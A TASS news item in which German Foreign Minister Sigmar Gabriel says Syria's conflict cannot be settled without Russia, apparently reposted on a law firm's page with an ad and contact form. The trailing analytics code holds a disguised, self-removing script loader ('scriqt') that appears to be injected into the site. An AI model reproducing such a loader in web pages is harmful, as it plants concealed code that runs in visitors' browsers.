Глава МИД ФРГ: без Москвы решить конфликт в Сирии не удастся

Глава МИД ФРГ: без Москвы решить конфликт в Сирии не удастся

При этом Зигмар Габриэль выразил уверенность, что российская сторона «не будет вечно защищать» президента САР Башара Асада.

БЕРЛИН, 9 апреля. /Корр. ТАСС Вячеслав Филиппов/. Конфликт в Сирии не удастся урегулировать без России. Такое мнение высказал министр иностранных дел ФРГ Зигмар Габриэль в интервью газете Bild.

«Я поддерживаю тесный контакт с моим российским коллегой Лавровым, — сказал он. — Без Москвы не удастся решить сирийский конфликт. И у меня есть впечатление, что Россия не будет вечно защищать Асада».

По его мнению, "только политическое решение при участии России, США и ключевых региональных игроков сможет положить конец страданиям людей"

«Сейчас важно, чтобы мы преодолели разобщенность Совета Безопасности ООН и продвинулись вперед в усилиях по достижению мира под эгидой ООН», — отметил Габриэль.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');